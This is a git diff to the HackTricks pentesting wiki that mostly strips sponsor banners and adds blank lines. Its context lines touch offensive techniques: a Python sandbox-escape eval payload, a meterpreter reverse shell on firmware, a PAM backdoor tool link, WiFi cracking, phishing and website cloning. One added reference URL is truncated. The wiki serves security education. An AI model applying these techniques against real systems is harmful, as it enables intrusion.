- -Deepen your expertise in **Mobile Security** with 8kSec Academy. Master iOS and Android security through our self-paced courses and get certified: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index eaf5835eb..b2dec97ec 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -65,3 +65,5 @@ Ultimately, this process enables bypassing of VLAN segmentation, thereby facilit - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md index 72dfbfb12..e4ab393dc 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md @@ -53,3 +53,5 @@ LDAP is a protocol enabling the management and access of directory information o Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index 02535d28b..197bb1abd 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/src/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -2,9 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} ``` nmap -sV -sC -O -n -oA nmapscan 192.168.0.1/24 @@ -259,8 +256,7 @@ Moreover, probes which do not have a specifically defined **`servicewaitms`** us If you don't want to change the values of **`totalwaitms`** and **`tcpwrappedms`** at all in the `/usr/share/nmap/nmap-service-probes` file, you can edit the [parsing code](https://github.com/nmap/nmap/blob/master/service_scan.cc#L1358) such that these values in the `nmap-service-probes` file are completely ignored. -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md index 552ff47a6..5e7063bae 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md +++ b/src/generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md @@ -116,3 +116,5 @@ After pinpointing IPv6 addresses associated with an organization, the `ping6` ut - [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md index b0cdfb651..506bbdc22 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md @@ -132,3 +132,5 @@ In Windows you **may be able to force some privileged accounts to authenticate t - [https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md b/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md index f7df86033..708620c75 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md +++ b/src/generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md @@ -31,3 +31,5 @@ To combat these threats, recommended measures include: In essence, while UPnP offers convenience and network fluidity, it also opens doors to potential exploitation. Awareness and proactive defense are key to ensuring network integrity. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md b/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md index c0c980660..a77ef8574 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md +++ b/src/generic-methodologies-and-resources/pentesting-network/webrtc-dos.md @@ -35,3 +35,5 @@ The described vulnerability in WebRTC media servers arises from a **race conditi This vulnerability highlights the delicate balance in media session initialization processes and the need for precise timing and verification mechanisms to prevent exploitation. Developers are advised to implement recommended security fixes and ensure robust verification processes to mitigate such vulnerabilities. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/README.md b/src/generic-methodologies-and-resources/pentesting-wifi/README.md index c7a6a26df..93f4b8d51 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/README.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/README.md @@ -2,21 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - ## Wifi basic commands ```bash @@ -297,21 +282,6 @@ So broken and unused nowdays. Just know that _**airgeddon**_ have a WEP option c --- -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - --- ## WPA/WPA2 PSK @@ -818,19 +788,6 @@ These methods, particularly PIN entry, are susceptible to the same vulnerabiliti TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github.com/wifiphisher/wifiphisher) (login con facebook e imitacionde WPA en captive portals) -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md b/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md index 0c3a3285a..3cbc89b40 100644 --- a/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md +++ b/src/generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md @@ -2,10 +2,7 @@ {{#include ../../banners/hacktricks-training.md}} -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} At some point I needed to use the proposed solution by the post bellow but the steps in [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) wasn't working in modern kali (2019v3) anymore.\ Anyway, it's easy to make them work.\ @@ -52,9 +49,8 @@ For further details check https://versprite.com/blog/application-security/eap-tl - [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/) -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! -{% embed url="https://go.intigriti.com/hacktricks" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/README.md b/src/generic-methodologies-and-resources/phishing-methodology/README.md index b3920d463..9fd49877b 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md @@ -466,3 +466,5 @@ Use [**Phishious** ](https://github.com/Rices/Phishious)to evaluate if your emai - [https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md index 9d61e953c..e65e547a8 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clone-a-website.md @@ -1,8 +1,5 @@ {{#include ../../banners/hacktricks-training.md}} -
- -{% embed url="https://websec.nl/" %} For a phishing assessment sometimes it might be useful to completely **clone a website**. @@ -29,8 +26,7 @@ goclone #https://github.com/trustedsec/social-engineer-toolkit ``` -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md b/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md index 61179a5d6..f861914cc 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/detecting-phising.md @@ -67,3 +67,5 @@ Using this last option you can even use the field Matching Identities to see if **One last alternative** is to gather a list of **newly registered domains** for some TLDs ([Whoxy](https://www.whoxy.com/newly-registered-domains/) provides such service) and **check the keywords in these domains**. However, long domains usually use one or more subdomains, therefore the keyword won't appear inside the FLD and you won't be able to find the phishing subdomain. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md index 94451778f..1e214fd8e 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/phishing-documents.md @@ -166,3 +166,5 @@ Don't forget that you cannot only steal the hash or the authentication but also - [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/README.md b/src/generic-methodologies-and-resources/python/README.md index 24aa268fb..bbad12bd5 100644 --- a/src/generic-methodologies-and-resources/python/README.md +++ b/src/generic-methodologies-and-resources/python/README.md @@ -2,13 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %} **Interesting pages to check:** @@ -18,12 +11,6 @@ Get Access Today: - [**Basic python web requests syntax**](web-requests.md) - [**Basic python syntax and libraries**](basic-python.md) -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=python) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=python" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/basic-python.md b/src/generic-methodologies-and-resources/python/basic-python.md index 4169ddcec..8acce1e6e 100644 --- a/src/generic-methodologies-and-resources/python/basic-python.md +++ b/src/generic-methodologies-and-resources/python/basic-python.md @@ -315,3 +315,5 @@ Execution time: 4.792213439941406e-05 seconds ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md index c0b324f39..33fd3bd76 100644 --- a/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md +++ b/src/generic-methodologies-and-resources/python/bruteforce-hash-few-chars.md @@ -52,3 +52,5 @@ main() ``` {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md index c9f8a782d..f2ae94730 100644 --- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md +++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md @@ -2,13 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} These are some tricks to bypass python sandbox protections and execute arbitrary commands. @@ -1152,12 +1145,7 @@ will be bypassed - [https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/eval_really_is_dangerous.html) - [https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6](https://infosecwriteups.com/how-assertions-can-get-you-hacked-da22c84fb8f6) -
- -**Get a hacker's perspective on your web apps, network, and cloud** - -**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports. - -{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md index cd57ced24..943bb1814 100644 --- a/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md +++ b/src/generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md @@ -235,3 +235,5 @@ builtins['eval'](builtins['input']()) ``` {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md index 502216e90..643f087e3 100644 --- a/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md +++ b/src/generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md @@ -268,3 +268,5 @@ python-internal-read-gadgets.md - [https://blog.abdulrah33m.com/prototype-pollution-in-python/](https://blog.abdulrah33m.com/prototype-pollution-in-python/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/pyscript.md b/src/generic-methodologies-and-resources/python/pyscript.md index 13c9f41ef..87cee8128 100644 --- a/src/generic-methodologies-and-resources/python/pyscript.md +++ b/src/generic-methodologies-and-resources/python/pyscript.md @@ -181,3 +181,5 @@ Result: ![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md b/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md index f973c6723..ce80aac4e 100644 --- a/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md +++ b/src/generic-methodologies-and-resources/python/python-internal-read-gadgets.md @@ -42,3 +42,5 @@ Use this payload to **change `app.secret_key`** (the name in your app might be d If the vulnerability is in a different python file, check the previous Flask trick to access the objects from the main python file. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/venv.md b/src/generic-methodologies-and-resources/python/venv.md index ecfd21e1c..9cdb2ba1a 100644 --- a/src/generic-methodologies-and-resources/python/venv.md +++ b/src/generic-methodologies-and-resources/python/venv.md @@ -2,13 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ```bash sudo apt-get install python3-venv @@ -29,12 +22,6 @@ pip3 install wheel inside the virtual environment ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/python/web-requests.md b/src/generic-methodologies-and-resources/python/web-requests.md index fdd3b78bc..e3a2a5110 100644 --- a/src/generic-methodologies-and-resources/python/web-requests.md +++ b/src/generic-methodologies-and-resources/python/web-requests.md @@ -2,13 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} ## Python Requests @@ -109,12 +102,6 @@ term = Terminal() term.cmdloop() ``` -
- -\ -Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} - {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/generic-methodologies-and-resources/threat-modeling.md b/src/generic-methodologies-and-resources/threat-modeling.md index 65bc6bcf4..6a177e4c8 100644 --- a/src/generic-methodologies-and-resources/threat-modeling.md +++ b/src/generic-methodologies-and-resources/threat-modeling.md @@ -109,3 +109,5 @@ Now your finished model should look something like this. And this is how you mak ### [Microsoft Threat Modeling Tool](https://aka.ms/threatmodelingtool) This is a free tool from Microsoft that helps in finding threats in the design phase of software projects. It uses the STRIDE methodology and is particularly suitable for those developing on Microsoft's stack. + + diff --git a/src/hardware-physical-access/escaping-from-gui-applications.md b/src/hardware-physical-access/escaping-from-gui-applications.md index 414b7c0e5..222a18233 100644 --- a/src/hardware-physical-access/escaping-from-gui-applications.md +++ b/src/hardware-physical-access/escaping-from-gui-applications.md @@ -277,3 +277,5 @@ These shortcuts are for the visual settings and sound settings, depending on the - [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/firmware-analysis/README.md b/src/hardware-physical-access/firmware-analysis/README.md index bf89ab6e0..901354696 100644 --- a/src/hardware-physical-access/firmware-analysis/README.md +++ b/src/hardware-physical-access/firmware-analysis/README.md @@ -252,3 +252,5 @@ To practice discovering vulnerabilities in firmware, use the following vulnerabl - [https://www.attify-store.com/products/offensive-iot-exploitation](https://www.attify-store.com/products/offensive-iot-exploitation) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md index b6998cdb0..1f97ce83f 100644 --- a/src/hardware-physical-access/firmware-analysis/bootloader-testing.md +++ b/src/hardware-physical-access/firmware-analysis/bootloader-testing.md @@ -50,3 +50,5 @@ The following steps are recommended for modifying device startup configurations - [https://scriptingxss.gitbook.io/firmware-security-testing-methodology/](https://scriptingxss.gitbook.io/firmware-security-testing-methodology/) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md index c83c28790..940292f12 100644 --- a/src/hardware-physical-access/firmware-analysis/firmware-integrity.md +++ b/src/hardware-physical-access/firmware-analysis/firmware-integrity.md @@ -25,3 +25,5 @@ If a root shell has already been obtained through dynamic analysis, bootloader m 5. The meterpreter reverse shell can be executed on the compromised device. {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/hardware-physical-access/physical-attacks.md b/src/hardware-physical-access/physical-attacks.md index cf14d497b..188604ba2 100644 --- a/src/hardware-physical-access/physical-attacks.md +++ b/src/hardware-physical-access/physical-attacks.md @@ -54,3 +54,5 @@ BitLocker encryption can potentially be bypassed if the **recovery password** is A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process. {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/interesting-http.md b/src/interesting-http.md index 8bfee0950..629dddcb3 100644 --- a/src/interesting-http.md +++ b/src/interesting-http.md @@ -38,3 +38,4 @@ Never put any sensitive data inside GET parameters or paths in the URL. {{#include ./banners/hacktricks-training.md}} + diff --git a/src/linux-hardening/bypass-bash-restrictions/README.md b/src/linux-hardening/bypass-bash-restrictions/README.md index b2ad89c12..6a6979672 100644 --- a/src/linux-hardening/bypass-bash-restrictions/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/README.md @@ -2,14 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} - ## Common Limitations Bypasses ### Reverse Shell @@ -353,14 +345,8 @@ bypass-fs-protections-read-only-no-exec-distroless/ - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) - [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) - [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) -- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secjuice.com/web-application-firewall-waf-evasion/) - -
- -\ -Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=bypass-bash-restrictions) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=bypass-bash-restrictions" %} +- [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secju {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md index 97dbeb20d..8ddfc9ec0 100644 --- a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md @@ -2,11 +2,6 @@ {{#include ../../../banners/hacktricks-training.md}} -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} ## Videos @@ -115,10 +110,7 @@ If there is **no `read-only/no-exec`** protections you could abuse your reverse You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE). -
- -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). - -{% embed url="https://www.stmcyber.com/careers" %} {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md index b73662cde..049ec17df 100644 --- a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md +++ b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/ddexec.md @@ -93,3 +93,5 @@ Block this, EDRs. - [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec) {{#include ../../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/freeipa-pentesting.md b/src/linux-hardening/freeipa-pentesting.md index 65be42a9b..6b12cd957 100644 --- a/src/linux-hardening/freeipa-pentesting.md +++ b/src/linux-hardening/freeipa-pentesting.md @@ -196,3 +196,5 @@ You can check a detailed explaination in [https://posts.specterops.io/attacking- - [https://www.youtube.com/watch?v=9dOu-7BTwPQ](https://www.youtube.com/watch?v=9dOu-7BTwPQ) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/linux-environment-variables.md b/src/linux-hardening/linux-environment-variables.md index cd0898773..0b3c182a5 100644 --- a/src/linux-hardening/linux-environment-variables.md +++ b/src/linux-hardening/linux-environment-variables.md @@ -122,3 +122,5 @@ One background job, one stopped and last command didn't finish correctly: ![](<../images/image (715).png>) {{#include ../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md index 151691982..6d9940a1d 100644 --- a/src/linux-hardening/linux-post-exploitation/README.md +++ b/src/linux-hardening/linux-post-exploitation/README.md @@ -53,3 +53,5 @@ The Pluggable Authentication Module (PAM) is a system used under Linux for user > You can automate this process with [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md index f68fd334b..6701742a1 100644 --- a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md +++ b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md @@ -53,3 +53,5 @@ In a setup with multiple auth modules, the process follows a strict order. If th - [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434) {{#include ../../banners/hacktricks-training.md}} + + diff --git a/src/linux-hardening/linux-privilege-escalation-checklist.md b/src/linux-hardening/linux-privilege-escalation-checklist.md index 7e992863a..7c7726b69 100644 --- a/src/linux-hardening/linux-privilege-escalation-checklist.md +++ b/src/linux-hardening/linux-privilege-escalation-checklist.md @@ -2,21 +2,6 @@ {{#include ../banners/hacktricks-training.md}} -
- -Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! - -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking - -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights - -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates - -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! - ### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) ### [System Information](privilege-escalation/#system-information) @@ -155,19 +140,6 @@ Stay informed with the newest bug bounties launching and crucial platform update - [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)? - [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)? -
